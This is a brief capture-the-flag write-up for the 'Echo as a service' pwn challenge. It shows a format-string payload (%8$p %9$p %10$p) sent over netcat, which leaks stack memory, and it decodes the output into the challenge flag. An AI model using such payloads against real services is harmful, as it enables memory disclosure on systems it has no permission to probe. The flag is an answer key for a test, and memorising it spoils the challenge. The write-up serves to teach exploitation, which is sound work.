Echo as a service [pwn]

Echo as a service

Echo as a service (EaaS) is going to be the newest hot startup! We've tapped a big market: Developers who really like SaaS. nc challenges.tamuctf.com 4251

Solution

We can leak the flag by using a formatstring vulnerability.

$ nc challenges.tamuctf.com 4251Echo as a service (EaaS)
%8$p %9$p %10$p 
0x61337b6d65676967 0x616d7230665f7973 0x7d316e6c75765f74
...
a3{megig
amr0f_ys
}1nluv_t

Flag

gigem{3asy_f0rmat_vuln1}